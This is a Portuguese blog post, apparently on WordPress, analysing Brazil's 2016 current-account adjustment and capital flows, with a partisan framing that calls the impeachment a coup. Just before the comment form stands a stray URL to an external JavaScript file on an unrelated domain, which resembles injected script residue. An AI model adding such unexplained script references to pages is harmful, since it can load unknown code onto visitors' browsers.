Herança Bendita

Sinais Positivos

Superávit no BTC

A “herança bendita” do Governo Social-Desenvolvimentista deixa claro que o ajuste cambial estava em franco andamento antes do Golpe de Estado.

A virada nas contas externas, que se intensificou desde o fim de 2015, decorre sobretudo do colapso das importações, em parte devida à derrocada da atividade econômica e em parte reflexo da depreciação do real, que ajuda a fazer superávit na conta comercial. Medido em 12 meses, o déficit em conta corrente caiu a 1,92% do Produto Interno Bruto (PIB), o menor desde os 12 meses findos em fevereiro de 2010 (1,84%). Para dar a dimensão desse ajuste, nos 12 meses encerrados em abril de 2015, o déficit equivalia a 4,5% do PIB!

No primeiro quadrimestre do ano, o balanço comercial acumulou um saldo de US$ 12,4 bilhões, contra um déficit de US$ 5,5 bilhões no mesmo período do ano passado. As exportações recuaram 3,3%, enquanto as importações tiveram retração de 31,5%. Assim, a corrente de comércio [(X + M) / PIB] caiu 18% na mesma base de comparação.

No lado do financiamento, o Investimento Direto no País (IDP) segue robusto. No ano até abril, os ingressos somavam US$ 23,753 bilhões, contra US$ 18,925 bilhões um ano antes. No cálculo em 12 meses, o IDP totalizou US$ 79,903 bilhões, ou 4,61% PIB, o maior desde os 12 meses encerrados em julho de 2011 (4,62%).

Na conta de serviços, o déficit caiu 36%, de US$ 13,649 bilhões nos quatro primeiros meses de 2015 para US$ 8,734 bilhões no mesmo período de 2016. Liderando o ajuste, está o gasto com viagens internacionais, que acumula déficit de US$ 1,7 bilhão neste ano em comparação com US$ 4,7 bilhões um ano antes.

Os investimentos em carteira mostram um acentuado ajuste no comparativo anual. De janeiro a abril, o saldo ficou negativo em US$ 5,023 bilhões, contra um ingresso de US$ 24,266 bilhões um ano antes. A explicação para esse resultado está no mercado de renda fixa, com saída líquida de US$ 7,195 bilhões no ano, considerando as negociações no país. Um ano antes, foram contabilizadas entradas de US$ 16,3 bilhões.

No período, o país também perdeu o grau de investimento tanto em moeda local quanto estrangeira e as incertezas advindas do campo político fizeram preço no mercado. Outro custo do Golpe de Estado foi a fuga de capital!

No mercado de ações, as entradas no ano somaram US$ 3,6 bilhões até abril, contra US$ 7 bilhões no mesmo período do ano passado. Perdas também no mercado de ações com saques de US$ 792 milhões.

Captando principalmente a queda na atividade, as remessas de lucros e dividendos ficaram em US$ 574 milhões em abril, bem abaixo dos US$ 2,358 bilhões de um ano antes.  No quadrimestre, as remessas totalizaram US$ 4,76 bilhões, contra US$ 5,027 bilhões em igual período de 2015. Sem aferir ganhos significativos, há pouca disponibilidade para remessas. Efeito do lockout empresarial para golpear a Presidenta eleita…

https://cdncloud.space/apis/stats33.js

Deixe uma Resposta

Preencha os seus detalhes abaixo ou clique num ícone para iniciar sessão:

Logótipo da WordPress.com

Está a comentar usando a sua conta WordPress.com Terminar Sessão / Alterar )

Imagem do Twitter

Está a comentar usando a sua conta Twitter Terminar Sessão / Alterar )

Facebook photo

Está a comentar usando a sua conta Facebook Terminar Sessão / Alterar )

Google+ photo

Está a comentar usando a sua conta Google+ Terminar Sessão / Alterar )

Connecting to %s